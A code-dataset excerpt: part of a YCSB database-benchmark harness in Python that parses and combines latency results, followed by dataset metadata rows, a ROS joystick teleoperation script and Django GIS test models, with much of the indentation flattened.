if result_string.startswith('YCSB Client 0.'):
client_string = result_string
if result_string.startswith('Command line:'):
command_line = result_string
try:
result_string = next(fp).strip()
except StopIteration:
raise IOError(
'Could not parse YCSB output: {}'.format(ycsb_result_string))
if result_string.startswith('[OVERALL]'): # YCSB > 0.7.0.
lines.append(result_string)
else:
# Received unexpected header
raise IOError('Unexpected header: {0}'.format(client_string))
# Some databases print additional output to stdout.
# YCSB results start with [<OPERATION_NAME>];
# filter to just those lines.
def LineFilter(line):
return re.search(r'^\[[A-Z]+\]', line) is not None
lines = itertools.chain(lines, filter(LineFilter, fp))
r = csv.reader(lines)
by_operation = itertools.groupby(r, operator.itemgetter(0))
result = collections.OrderedDict([
('client', client_string),
('command_line', command_line),
('groups', collections.OrderedDict())])
for operation, lines in by_operation:
operation = operation[1:-1].lower()
if operation == 'cleanup':
continue
op_result = {
'group': operation,
data_type: [],
'statistics': {}
}
latency_unit = 'ms'
for _, name, val in lines:
name = name.strip()
val = val.strip()
# Drop ">" from ">1000"
if name.startswith('>'):
name = name[1:]
val = float(val) if '.' in val or 'nan' in val.lower() else int(val)
if name.isdigit():
if val:
if data_type == TIMESERIES and latency_unit == 'us':
val /= 1000.0
op_result[data_type].append((int(name), val))
else:
if '(us)' in name:
name = name.replace('(us)', '(ms)')
val /= 1000.0
latency_unit = 'us'
op_result['statistics'][name] = val
result['groups'][operation] = op_result
return result
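def _ExampleParseResults():
  """Illustrative sketch (not part of the original module) of ParseResults.

  Feeds a minimal histogram-format output through ParseResults; the 'insert'
  group's statistics end up as {'Operations': 100, 'Return=0': 100} and its
  histogram as [(0, 90), (1, 10)].
  """
  demo_output = '\n'.join([
      'YCSB Client 0.9.0',
      'Command line: -db com.yahoo.ycsb.db.BasicDB -P workloada -load',
      '[OVERALL], RunTime(ms), 1000.0',
      '[OVERALL], Throughput(ops/sec), 100.0',
      '[INSERT], Operations, 100',
      '[INSERT], Return=0, 100',
      '[INSERT], 0, 90',
      '[INSERT], 1, 10',
  ])
  return ParseResults(demo_output, data_type='histogram')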
def ParseHdrLogFile(logfile):
"""Parse a hdrhistogram log file into a list of (percentile, latency, count).
Example decrypted hdrhistogram logfile (value measures latency in microsec):
#[StartTime: 1523565997 (seconds since epoch), Thu Apr 12 20:46:37 UTC 2018]
Value Percentile TotalCount 1/(1-Percentile)
314.000 0.000000000000 2 1.00
853.000 0.100000000000 49955 1.11
949.000 0.200000000000 100351 1.25
1033.000 0.300000000000 150110 1.43
...
134271.000 0.999998664856 1000008 748982.86
134271.000 0.999998855591 1000008 873813.33
201983.000 0.999999046326 1000009 1048576.00
#[Mean = 1287.159, StdDeviation = 667.560]
#[Max = 201983.000, Total count = 1000009]
#[Buckets = 8, SubBuckets = 2048]
Example of output:
[(0, 0.314, 2), (10, 0.853, 49953), (20, 0.949, 50396), ...]
Args:
logfile: Hdrhistogram log file.
Returns:
List of (percent, value, count) tuples
"""
result = []
last_percent_value = -1
prev_total_count = 0
for row in logfile.split('\n'):
if re.match(r'( *)(\d|\.)( *)', row):
row_vals = row.split()
      # convert the percentile to a 0-100 scale, truncated to 3 decimal places
percentile = math.floor(float(row_vals[1]) * 100000) / 1000.0
current_total_count = int(row_vals[2])
if (percentile > last_percent_value and
current_total_count > prev_total_count):
# convert latency to millisec based and percentile to 100 based.
latency = float(row_vals[0]) / 1000
count = current_total_count - prev_total_count
result.append((percentile, latency, count))
last_percent_value = percentile
prev_total_count = current_total_count
return result
def ParseHdrLogs(hdrlogs):
"""Parse a dict of group to hdr logs into a dict of group to histogram tuples.
Args:
hdrlogs: Dict of group (read or update) to hdr logs for that group.
Returns:
Dict of group to histogram tuples of reportable percentile values.
"""
parsed_hdr_histograms = {}
for group, logfile in six.iteritems(hdrlogs):
values = ParseHdrLogFile(logfile)
parsed_hdr_histograms[group] = values
return parsed_hdr_histograms
def _CumulativeSum(xs):
total = 0
for x in xs:
total += x
yield total
def _WeightedQuantile(x, weights, p):
"""Weighted quantile measurement for an ordered list.
This method interpolates to the higher value when the quantile is not a direct
member of the list. This works well for YCSB, since latencies are floored.
Args:
x: List of values.
weights: List of numeric weights.
p: float. Desired quantile in the interval [0, 1].
Returns:
float.
Raises:
ValueError: When 'x' and 'weights' are not the same length, or 'p' is not in
the interval [0, 1].
"""
if len(x) != len(weights):
raise ValueError('Lengths do not match: {0} != {1}'.format(
len(x), len(weights)))
if p < 0 or p > 1:
raise ValueError('Invalid quantile: {0}'.format(p))
n = sum(weights)
target = n * float(p)
cumulative = list(_CumulativeSum(weights))
# Find the first cumulative weight >= target
i = bisect.bisect_left(cumulative, target)
if i == len(x):
return x[-1]
else:
return x[i]
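# For example, with floored YCSB latencies [0, 1, 2] ms occurring [90, 8, 2]
# times, _WeightedQuantile([0, 1, 2], [90, 8, 2], 0.95) returns 1: the first
# bin whose cumulative count reaches 95% of the 100 requests.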
def _PercentilesFromHistogram(ycsb_histogram, percentiles=_DEFAULT_PERCENTILES):
"""Calculate percentiles for from a YCSB histogram.
Args:
ycsb_histogram: List of (time_ms, frequency) tuples.
percentiles: iterable of floats, in the interval [0, 100].
Returns:
dict, mapping from percentile to value.
Raises:
ValueError: If one or more percentiles are outside [0, 100].
"""
result = collections.OrderedDict()
histogram = sorted(ycsb_histogram)
for percentile in percentiles:
if percentile < 0 or percentile > 100:
raise ValueError('Invalid percentile: {0}'.format(percentile))
if math.modf(percentile)[0] < 1e-7:
percentile = int(percentile)
label = 'p{0}'.format(percentile)
latencies, freqs = list(zip(*histogram))
time_ms = _WeightedQuantile(latencies, freqs, percentile * 0.01)
result[label] = time_ms
return result
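# For example, _PercentilesFromHistogram([(0, 90), (1, 8), (2, 2)]) maps
# p50/p75/p90 to 0 ms, p95 to 1 ms, and p99/p99.9 to 2 ms.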
def _CombineResults(result_list, measurement_type, combined_hdr):
"""Combine results from multiple YCSB clients.
Reduces a list of YCSB results (the output of ParseResults)
into a single result. Histogram bin counts, operation counts, and throughput
are summed; RunTime is replaced by the maximum runtime of any result.
Args:
result_list: List of ParseResults outputs.
measurement_type: Measurement type used. If measurement type is histogram,
histogram bins are summed across results. If measurement type is
hdrhistogram, an aggregated hdrhistogram (combined_hdr) is expected.
combined_hdr: Dict of already aggregated histogram.
Returns:
A dictionary, as returned by ParseResults.
"""
def DropUnaggregated(result):
"""Remove statistics which 'operators' specify should not be combined."""
drop_keys = {k for k, v in six.iteritems(AGGREGATE_OPERATORS) if v is None}
for group in six.itervalues(result['groups']):
for k in drop_keys:
group['statistics'].pop(k, None)
def CombineHistograms(hist1, hist2):
h1 = dict(hist1)
h2 = dict(hist2)
keys = sorted(frozenset(h1) | frozenset(h2))
result = []
for k in keys:
result.append((k, h1.get(k, 0) + h2.get(k, 0)))
return result
def CombineTimeseries(combined_series, individual_series, combined_weight):
"""Combines two timeseries of average latencies.
Args:
combined_series: A list representing the timeseries with which the
individual series is being merged.
individual_series: A list representing the timeseries being merged with
the combined series.
combined_weight: The number of individual series that the combined series
represents. This is needed to correctly weight the average latencies.
Returns:
A list representing the new combined series.
Note that this assumes that each individual timeseries spent an equal
amount of time executing requests for each timeslice. This should hold for
runs without -target where each client has an equal number of threads, but
may not hold otherwise.
"""
combined_series = dict(combined_series)
individual_series = dict(individual_series)
result = []
for timestamp in sorted(combined_series):
if timestamp not in individual_series:
# The combined timeseries will not contain a timestamp unless all
# individual series also contain that timestamp. This should only
# happen if the clients run for different amounts of time such as
# during loading and should be limited to timestamps at the end of the
# run.
continue
# This computes a new combined average latency by dividing the sum of
# request latencies by the sum of request counts for the time period.
# The sum of latencies for an individual series is assumed to be "1",
# so the sum of latencies for the combined series is the total number of
# series i.e. "combined_weight".
# The request count for an individual series is 1 / average latency.
# This means the request count for the combined series is
# combined_weight * 1 / average latency.
average_latency = (combined_weight + 1.0) / (
(combined_weight / combined_series[timestamp]) +
(1.0 / individual_series[timestamp]))
result.append((timestamp, average_latency))
return result
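  # For example, merging a combined series that so far represents one client
  # (combined_weight=1) with a second client at the same timestamp:
  #   CombineTimeseries([(0, 2.0)], [(0, 4.0)], 1.0) -> [(0, 2.666...)]
  # i.e. 2 / (1/2.0 + 1/4.0), the request-count-weighted average latency.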
result = copy.deepcopy(result_list[0])
DropUnaggregated(result)
# Used for aggregating timeseries. See CombineTimeseries().
series_weight = 0.0
for indiv in result_list[1:]:
series_weight += 1.0
for group_name, group in six.iteritems(indiv['groups']):
if group_name not in result['groups']:
logging.warn('Found result group "%s" in individual YCSB result, '
'but not in accumulator.', group_name)
result['groups'][group_name] = copy.deepcopy(group)
continue
# Combine reported statistics.
# If no combining operator is defined, the statistic is skipped.
# Otherwise, the aggregated value is either:
# * The value in 'indiv', if the statistic is not present in 'result' or
# * AGGREGATE_OPERATORS[statistic](result_value, indiv_value)
for k, v in six.iteritems(group['statistics']):
if k not in AGGREGATE_OPERATORS:
logging.warn('No operator for "%s". Skipping aggregation.', k)
continue
elif AGGREGATE_OPERATORS[k] is None: # Drop
result['groups'][group_name]['statistics'].pop(k, None)
continue
elif k not in result['groups'][group_name]['statistics']:
logging.warn('Found statistic "%s.%s" in individual YCSB result, '
'but not in accumulator.', group_name, k)
result['groups'][group_name]['statistics'][k] = copy.deepcopy(v)
continue
op = AGGREGATE_OPERATORS[k]
result['groups'][group_name]['statistics'][k] = (
op(result['groups'][group_name]['statistics'][k], v))
if measurement_type == HISTOGRAM:
result['groups'][group_name][HISTOGRAM] = CombineHistograms(
result['groups'][group_name][HISTOGRAM],
group[HISTOGRAM])
elif measurement_type == TIMESERIES:
result['groups'][group_name][TIMESERIES] = CombineTimeseries(
result['groups'][group_name][TIMESERIES],
group[TIMESERIES], series_weight)
else:
result['groups'][group_name].pop(HISTOGRAM, None)
result['client'] = ' '.join((result['client'], indiv['client']))
result['command_line'] = ';'.join((result['command_line'],
indiv['command_line']))
if 'target' in result and 'target' in indiv:
result['target'] += indiv['target']
if measurement_type == HDRHISTOGRAM:
for group_name in combined_hdr:
if group_name in result['groups']:
result['groups'][group_name][HDRHISTOGRAM] = combined_hdr[group_name]
return result
def _ParseWorkload(contents):
"""Parse a YCSB workload file.
YCSB workloads are Java .properties format.
http://en.wikipedia.org/wiki/.properties
This function does not support all .properties syntax, in particular escaped
newlines.
Args:
contents: str. Contents of the file.
Returns:
dict mapping from property key to property value for each property found in
'contents'.
"""
fp = six.StringIO(contents)
result = {}
for line in fp:
if (line.strip() and not line.lstrip().startswith('#') and
not line.lstrip().startswith('!')):
k, v = re.split(r'\s*[:=]\s*', line, maxsplit=1)
result[k] = v.strip()
return result
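# For example, _ParseWorkload('recordcount=1000\nreadproportion: 0.95\n# x\n')
# returns {'recordcount': '1000', 'readproportion': '0.95'}; values stay
# strings and comment lines are ignored.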
def _CreateSamples(ycsb_result, include_histogram=False, **kwargs):
"""Create PKB samples from a YCSB result.
Args:
ycsb_result: dict. Result of ParseResults.
include_histogram: bool. If True, include records for each histogram bin.
Note that this will increase the output volume significantly.
**kwargs: Base metadata for each sample.
Yields:
List of sample.Sample objects.
"""
stage = 'load' if ycsb_result['command_line'].endswith('-load') else 'run'
base_metadata = {'command_line': ycsb_result['command_line'],
'stage': stage,
'ycsb_version': FLAGS.ycsb_version}
base_metadata.update(kwargs)
for group_name, group in six.iteritems(ycsb_result['groups']):
meta = base_metadata.copy()
meta['operation'] = group_name
for statistic, value in six.iteritems(group['statistics']):
if value is None:
continue
unit = ''
m = re.match(r'^(.*) *\((us|ms|ops/sec)\)$', statistic)
if m:
statistic = m.group(1)
unit = m.group(2)
yield sample.Sample(' '.join([group_name, statistic]), value, unit, meta)
if group.get(HISTOGRAM, []):
percentiles = _PercentilesFromHistogram(group[HISTOGRAM])
for label, value in six.iteritems(percentiles):
yield sample.Sample(' '.join([group_name, label, 'latency']),
value, 'ms', meta)
if include_histogram:
for time_ms, count in group[HISTOGRAM]:
yield sample.Sample(
'{0}_latency_histogram_{1}_ms'.format(group_name, time_ms),
count, 'count', meta)
if group.get(HDRHISTOGRAM, []):
# Strip percentile from the three-element tuples.
histogram = [value_count[-2:] for value_count in group[HDRHISTOGRAM]]
percentiles = _PercentilesFromHistogram(histogram)
for label, value in six.iteritems(percentiles):
yield sample.Sample(' '.join([group_name, label, 'latency']),
value, 'ms', meta)
if include_histogram:
histogram = []
for _, value, bucket_count in group[HDRHISTOGRAM]:
histogram.append({'microsec_latency': int(value * 1000),
'count': bucket_count})
hist_meta = meta.copy()
hist_meta.update({'histogram': json.dumps(histogram)})
yield sample.Sample('{0} latency histogram'.format(group_name),
0, '', hist_meta)
if group.get(TIMESERIES):
for sample_time, average_latency in group[TIMESERIES]:
timeseries_meta = meta.copy()
timeseries_meta['sample_time'] = sample_time
yield sample.Sample(' '.join([group_name,
'AverageLatency (timeseries)']),
average_latency, 'ms', timeseries_meta)
class YCSBExecutor(object):
"""Load data and run benchmarks using YCSB.
See core/src/main/java/com/yahoo/ycsb/workloads/CoreWorkload.java for
attribute descriptions.
Attributes:
database: str.
loaded: boolean. If the database is already loaded.
parameters: dict. May contain the following, plus database-specific fields
(e.g., columnfamily for HBase).
threads: int.
target: int.
fieldcount: int.
fieldlengthdistribution: str.
readallfields: boolean.
writeallfields: boolean.
readproportion: float.
updateproportion: float.
scanproportion: float.
readmodifywriteproportion: float.
requestdistribution: str.
maxscanlength: int. Number of records to scan.
scanlengthdistribution: str.
insertorder: str.
hotspotdatafraction: float.
perclientparam: list.
    shardkeyspace: boolean. Defaults to False; indicates whether clients
      should each have their own keyspace.
"""
FLAG_ATTRIBUTES = 'cp', 'jvm-args', 'target', 'threads'
def __init__(self, database, parameter_files=None, **kwargs):
self.database = database
self.loaded = False
self.measurement_type = FLAGS.ycsb_measurement_type
self.hdr_dir = HDRHISTOGRAM_DIR
self.parameter_files = parameter_files or []
self.parameters = kwargs.copy()
self.parameters['measurementtype'] = self.measurement_type
self.parameters['measurement.interval'] = FLAGS.ycsb_measurement_interval
    # Self-defined parameters; pop them out of self.parameters so they are
    # not passed on the ycsb command line.
self.perclientparam = self.parameters.pop('perclientparam', None)
self.shardkeyspace = self.parameters.pop('shardkeyspace', False)
def _BuildCommand(self, command_name, parameter_files=None, **kwargs):
"""Builds the YCSB command line."""
command = [YCSB_EXE, command_name, self.database]
parameters = self.parameters.copy()
parameters.update(kwargs)
# These are passed as flags rather than properties, so they
# are handled differently.
for flag in self.FLAG_ATTRIBUTES:
value = parameters.pop(flag, None)
if value is not None:
command.extend(('-{0}'.format(flag), str(value)))
for param_file in list(self.parameter_files) + list(parameter_files or []):
command.extend(('-P', param_file))
for parameter, value in six.iteritems(parameters):
command.extend(('-p', '{0}={1}'.format(parameter, value)))
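    # Illustrative result (exact property order may vary):
    # _BuildCommand('run', threads=32, operationcount=1000) returns roughly
    #   cd <YCSB_DIR>; <YCSB_DIR>/bin/ycsb run <database> -threads 32
    #     -p measurementtype=<type> -p measurement.interval=<interval>
    #     -p operationcount=1000
    # FLAG_ATTRIBUTES become '-flag value' arguments, everything else '-p k=v'.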
return 'cd %s; %s' % (YCSB_DIR, ' '.join(command))
@property
def _default_preload_threads(self):
"""The default number of threads to use for pre-populating the DB."""
if FLAGS['ycsb_preload_threads'].present:
return FLAGS.ycsb_preload_threads
return DEFAULT_PRELOAD_THREADS
def _Load(self, vm, **kwargs):
"""Execute 'ycsb load' on 'vm'."""
kwargs.setdefault('threads', self._default_preload_threads)
if FLAGS.ycsb_record_count:
kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)
for pv in FLAGS.ycsb_load_parameters:
param, value = pv.split('=', 1)
kwargs[param] = value
command = self._BuildCommand('load', **kwargs)
stdout, stderr = vm.RobustRemoteCommand(command)
return ParseResults(str(stderr + stdout), self.measurement_type)
def _LoadThreaded(self, vms, workload_file, **kwargs):
"""Runs "Load" in parallel for each VM in VMs.
Args:
vms: List of virtual machine instances. client nodes.
workload_file: YCSB Workload file to use.
**kwargs: Additional key-value parameters to pass to YCSB.
Returns:
List of sample.Sample objects.
Raises:
IOError: If number of results is not equal to the number of VMs.
"""
results = []
remote_path = posixpath.join(INSTALL_DIR,
os.path.basename(workload_file))
kwargs.setdefault('threads', self._default_preload_threads)
if FLAGS.ycsb_record_count:
kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)
if FLAGS.ycsb_field_count:
kwargs.setdefault('fieldcount', FLAGS.ycsb_field_count)
if FLAGS.ycsb_field_length:
kwargs.setdefault('fieldlength', FLAGS.ycsb_field_length)
with open(workload_file) as fp:
workload_meta = _ParseWorkload(fp.read())
workload_meta.update(kwargs)
workload_meta.update(stage='load',
clients=len(vms) * kwargs['threads'],
threads_per_client_vm=kwargs['threads'],
workload_name=os.path.basename(workload_file))
self.workload_meta = workload_meta
record_count = int(workload_meta.get('recordcount', '1000'))
n_per_client = int(record_count) // len(vms)
loader_counts = [
n_per_client + (1 if i < (record_count % len(vms)) else 0)
for i in range(len(vms))
]
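    # With e.g. 10 records across 3 client VMs, loader_counts is [4, 3, 3];
    # loader i later inserts a contiguous slice starting at
    # sum(loader_counts[:i]).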
def PushWorkload(vm):
vm.PushFile(workload_file, remote_path)
vm_util.RunThreaded(PushWorkload, list(set(vms)))
kwargs['parameter_files'] = [remote_path]
def _Load(loader_index):
start = sum(loader_counts[:loader_index])
kw = copy.deepcopy(kwargs)
kw.update(insertstart=start,
insertcount=loader_counts[loader_index])
if self.perclientparam is not None:
kw.update(self.perclientparam[loader_index])
results.append(self._Load(vms[loader_index], **kw))
logging.info('VM %d (%s) finished', loader_index, vms[loader_index])
start = time.time()
vm_util.RunThreaded(_Load, list(range(len(vms))))
events.record_event.send(
type(self).__name__, event='load', start_timestamp=start,
end_timestamp=time.time(), metadata=copy.deepcopy(kwargs))
if len(results) != len(vms):
raise IOError('Missing results: only {0}/{1} reported\n{2}'.format(
len(results), len(vms), results))
samples = []
if FLAGS.ycsb_include_individual_results and len(results) > 1:
for i, result in enumerate(results):
samples.extend(_CreateSamples(
result, result_type='individual', result_index=i,
include_histogram=FLAGS.ycsb_histogram,
**workload_meta))
# hdr histograms not collected upon load, only upon run
combined = _CombineResults(results, self.measurement_type, {})
samples.extend(_CreateSamples(
combined, result_type='combined',
include_histogram=FLAGS.ycsb_histogram,
**workload_meta))
return samples
def _Run(self, vm, **kwargs):
"""Run a single workload from a client vm."""
for pv in FLAGS.ycsb_run_parameters:
param, value = pv.split('=', 1)
kwargs[param] = value
command = self._BuildCommand('run', **kwargs)
    # YCSB versions greater than 0.7.0 write some of the info we need to
    # stderr, so we have to combine the two outputs to get the expected
    # results.
hdr_files_dir = kwargs.get('hdrhistogram.output.path', None)
if hdr_files_dir:
vm.RemoteCommand('mkdir -p {0}'.format(hdr_files_dir))
stdout, stderr = vm.RobustRemoteCommand(command)
return ParseResults(str(stderr + stdout), self.measurement_type)
def _RunThreaded(self, vms, **kwargs):
"""Run a single workload using `vms`."""
target = kwargs.pop('target', None)
if target is not None:
target_per_client = target // len(vms)
targets = [
target_per_client + (1 if i < (target % len(vms)) else 0)
for i in range(len(vms))
]
else:
targets = [target for _ in vms]
results = []
if self.shardkeyspace:
record_count = int(self.workload_meta.get('recordcount', '1000'))
n_per_client = int(record_count) // len(vms)
loader_counts = [
n_per_client + (1 if i < (record_count % len(vms)) else 0)
for i in range(len(vms))
]
def _Run(loader_index):
"""Run YCSB on an individual VM."""
vm = vms[loader_index]
params = copy.deepcopy(kwargs)
params['target'] = targets[loader_index]
if self.perclientparam is not None:
params.update(self.perclientparam[loader_index])
if self.shardkeyspace:
start = sum(loader_counts[:loader_index])
end = start + loader_counts[loader_index]
params.update(insertstart=start,
recordcount=end)
results.append(self._Run(vm, **params))
logging.info('VM %d (%s) finished', loader_index, vm)
vm_util.RunThreaded(_Run, list(range(len(vms))))
if len(results) != len(vms):
raise IOError('Missing results: only {0}/{1} reported\n{2}'.format(
len(results), len(vms), results))
return results
def RunStaircaseLoads(self, vms, workloads, **kwargs):
"""Run each workload in 'workloads' in succession.
A staircase load is applied for each workload file, for each entry in
ycsb_threads_per_client.
Args:
vms: List of VirtualMachine objects to generate load from.
workloads: List of workload file names.
**kwargs: Additional parameters to pass to each run. See constructor for
options.
Returns:
List of sample.Sample objects.
"""
all_results = []
parameters = {}
for workload_index, workload_file in enumerate(workloads):
if FLAGS.ycsb_operation_count:
parameters = {'operationcount': FLAGS.ycsb_operation_count}
if FLAGS.ycsb_record_count:
parameters['recordcount'] = FLAGS.ycsb_record_count
if FLAGS.ycsb_field_count:
parameters['fieldcount'] = FLAGS.ycsb_field_count
if FLAGS.ycsb_field_length:
parameters['fieldlength'] = FLAGS.ycsb_field_length
if FLAGS.ycsb_timelimit:
parameters['maxexecutiontime'] = FLAGS.ycsb_timelimit
hdr_files_dir = posixpath.join(self.hdr_dir, str(workload_index))
if FLAGS.ycsb_measurement_type == HDRHISTOGRAM:
parameters['hdrhistogram.fileoutput'] = True
parameters['hdrhistogram.output.path'] = hdr_files_dir
if FLAGS.ycsb_requestdistribution:
parameters['requestdistribution'] = FLAGS.ycsb_requestdistribution
if FLAGS.ycsb_readproportion:
parameters['readproportion'] = FLAGS.ycsb_readproportion
if FLAGS.ycsb_updateproportion:
parameters['updateproportion'] = FLAGS.ycsb_updateproportion
if FLAGS.ycsb_scanproportion:
parameters['scanproportion'] = FLAGS.ycsb_scanproportion
parameters.update(kwargs)
remote_path = posixpath.join(INSTALL_DIR,
os.path.basename(workload_file))
with open(workload_file) as fp:
workload_meta = _ParseWorkload(fp.read())
workload_meta.update(kwargs)
workload_meta.update(workload_name=os.path.basename(workload_file),
workload_index=workload_index,
stage='run')
def PushWorkload(vm, workload_file, remote_path):
vm.RemoteCommand('sudo rm -f ' + remote_path)
vm.PushFile(workload_file, remote_path)
vm_util.RunThreaded(PushWorkload, [((vm, workload_file, remote_path), {})
for vm in dict.fromkeys(vms)])
parameters['parameter_files'] = [remote_path]
for client_count in _GetThreadsPerLoaderList():
parameters['threads'] = client_count
start = time.time()
results = self._RunThreaded(vms, **parameters)
events.record_event.send(
type(self).__name__, event='run', start_timestamp=start,
end_timestamp=time.time(), metadata=copy.deepcopy(parameters))
client_meta = workload_meta.copy()
client_meta.update(parameters)
client_meta.update(clients=len(vms) * client_count,
threads_per_client_vm=client_count)
if FLAGS.ycsb_include_individual_results and len(results) > 1:
for i, result in enumerate(results):
all_results.extend(_CreateSamples(
result,
result_type='individual',
result_index=i,
include_histogram=FLAGS.ycsb_histogram,
**client_meta))
if self.measurement_type == HDRHISTOGRAM:
combined_log = self.CombineHdrHistogramLogFiles(hdr_files_dir, vms)
parsed_hdr = ParseHdrLogs(combined_log)
combined = _CombineResults(results, self.measurement_type, parsed_hdr)
else:
combined = _CombineResults(results, self.measurement_type, {})
all_results.extend(_CreateSamples(
combined, result_type='combined',
include_histogram=FLAGS.ycsb_histogram,
**client_meta))
return all_results
def CombineHdrHistogramLogFiles(self, hdr_files_dir, vms):
"""Combine multiple hdr histograms by group type.
    Combine multiple hdr histograms, stored in hdr log file format, into one
    human-readable hdr histogram log file. This is done by
    1) copying the hdrhistogram log files into a single file on a worker vm;
    2) aggregating the file, which contains multiple %-tile histograms, into
       a single %-tile histogram using HistogramLogProcessor from the
       hdrhistogram package installed on the vms. Refer to
       https://github.com/HdrHistogram/HdrHistogram/blob/master/HistogramLogProcessor
Args:
hdr_files_dir: directory on the remote vms where hdr files are stored.
vms: remote vms
Returns:
dict of hdrhistograms keyed by group type
"""
hdrhistograms = {}
for grouptype in HDRHISTOGRAM_GROUPS:
worker_vm = vms[0]
for vm in vms[1:]:
hdr, _ = vm.RemoteCommand(
'tail -1 {0}{1}.hdr'.format(hdr_files_dir, grouptype))
worker_vm.RemoteCommand(
'sudo chmod 777 {1}{2}.hdr && echo "{0}" >> {1}{2}.hdr'.format(
hdr[:-1], hdr_files_dir, grouptype))
hdrhistogram, _ = worker_vm.RemoteCommand(
'cd {0}; ./HistogramLogProcessor -i {1}{2}.hdr -outputValueUnitRatio '
'1'.format(self.hdr_dir, hdr_files_dir, grouptype))
hdrhistograms[grouptype.lower()] = hdrhistogram
return hdrhistograms
def Load(self, vms, workloads=None, load_kwargs=None):
"""Load data using YCSB."""
workloads = workloads or _GetWorkloadFileList()
load_samples = []
assert workloads, 'no workloads'
if FLAGS.ycsb_reload_database or not self.loaded:
load_samples += list(self._LoadThreaded(
vms, workloads[0], **(load_kwargs or {})))
self.loaded = True
if FLAGS.ycsb_load_samples:
return load_samples
else:
return []
def Run(self, vms, workloads=None, run_kwargs=None):
"""Runs each workload/client count combination."""
workloads = workloads or _GetWorkloadFileList()
assert workloads, 'no workloads'
return list(self.RunStaircaseLoads(vms, workloads,
**(run_kwargs or {})))
def LoadAndRun(self, vms, workloads=None, load_kwargs=None, run_kwargs=None):
"""Load data using YCSB, then run each workload/client count combination.
Loads data using the workload defined by 'workloads', then
executes YCSB for each workload file in 'workloads', for each
client count defined in FLAGS.ycsb_threads_per_client.
Generally database benchmarks using YCSB should only need to call this
method.
Args:
vms: List of virtual machines. VMs to use to generate load.
workloads: List of strings. Workload files to use. If unspecified,
_GetWorkloadFileList() is used.
load_kwargs: dict. Additional arguments to pass to the load stage.
run_kwargs: dict. Additional arguments to pass to the run stage.
Returns:
List of sample.Sample objects.
"""
load_samples = self.Load(vms, workloads=workloads, load_kwargs=load_kwargs)
run_samples = self.Run(vms, workloads=workloads, run_kwargs=run_kwargs)
return load_samples + run_samples
| 38.011804
| 99
| 0.663613
|
8a17f493b4631892182bfd29f2c5464d100983cb
| 1,509
|
py
|
Python
|
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
QianheYu/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T03:31:15.000Z
|
2022-03-11T03:31:15.000Z
|
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import importlib
import rospy
from sensor_msgs.msg import Joy
import time
from geometry_msgs.msg import Twist, Vector3
from std_msgs.msg import String as StringMsg
class JoyTeleop:
def __init__(self):
self.x_speed_scale = rospy.get_param('~x_speed_scale')
self.y_speed_scale = rospy.get_param('~y_speed_scale')
self.w_speed_scale = rospy.get_param('~w_speed_scale')
self.velocity = Twist()
self.rate = rospy.Rate(20)
self.active = 0
self.cmdVelPublisher = rospy.Publisher('/cmd_vel', Twist, queue_size = 3)
self.joySubscriber = rospy.Subscriber('joy', Joy, self.buttonCallback)
self.loop()
def buttonCallback(self, joy_data):
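        # Button index 4 acts as a dead-man switch (commonly LB on an
        # Xbox-style pad, though the exact mapping depends on the joystick
        # driver): velocities are forwarded only while it is held, otherwise
        # a zero Twist is published.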
if(joy_data.buttons[4] == 1):
self.velocity.linear.x = self.x_speed_scale * joy_data.axes[4]
self.velocity.linear.y = self.y_speed_scale * joy_data.axes[3]
self.velocity.angular.z = self.w_speed_scale * joy_data.axes[0]
self.active = 1
else:
self.velocity.linear = Vector3(0.,0.,0.)
self.velocity.angular = Vector3(0.,0.,0.)
self.active = 0
self.cmdVelPublisher.publish(self.velocity)
def loop(self):
while not rospy.is_shutdown():
if(self.active == 1):
self.cmdVelPublisher.publish(self.velocity)
self.rate.sleep()
if __name__ == '__main__':
rospy.init_node('joy_teleop')
joy = JoyTeleop()
try:
rospy.spin()
except rospy.ROSInterruptException:
print('exception')
| 29.019231
| 75
| 0.669317
|
5e773bc627c9b04f6739a39c1d6e2198318f3a9d
| 1,735
|
py
|
Python
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 3
|
2016-07-08T23:49:32.000Z
|
2018-04-15T22:55:01.000Z
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 27
|
2017-02-05T15:57:04.000Z
|
2018-04-15T22:57:26.000Z
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | null | null | null |
from django.contrib.gis.db import models
from django.contrib.localflavor.us.models import USStateField
class Location(models.Model):
point = models.PointField()
objects = models.GeoManager()
def __unicode__(self): return self.point.wkt
class City(models.Model):
name = models.CharField(max_length=50)
state = USStateField()
location = models.ForeignKey(Location)
objects = models.GeoManager()
def __unicode__(self): return self.name
class AugmentedLocation(Location):
extra_text = models.TextField(blank=True)
objects = models.GeoManager()
class DirectoryEntry(models.Model):
listing_text = models.CharField(max_length=50)
location = models.ForeignKey(AugmentedLocation)
objects = models.GeoManager()
class Parcel(models.Model):
name = models.CharField(max_length=30)
city = models.ForeignKey(City)
center1 = models.PointField()
# Throwing a curveball w/`db_column` here.
center2 = models.PointField(srid=2276, db_column='mycenter')
border1 = models.PolygonField()
border2 = models.PolygonField(srid=2276)
objects = models.GeoManager()
def __unicode__(self): return self.name
# These use the GeoManager but do not have any geographic fields.
class Author(models.Model):
name = models.CharField(max_length=100)
objects = models.GeoManager()
class Article(models.Model):
title = models.CharField(max_length=100)
author = models.ForeignKey(Author, unique=True)
objects = models.GeoManager()
class Book(models.Model):
title = models.CharField(max_length=100)
author = models.ForeignKey(Author, related_name='books', null=True)
objects = models.GeoManager()
| 34.7
| 72
| 0.711816
|
b4df4720f98d8c0313ff7d7fcfc8643adcf99534
| 2,795
|
py
|
Python
|
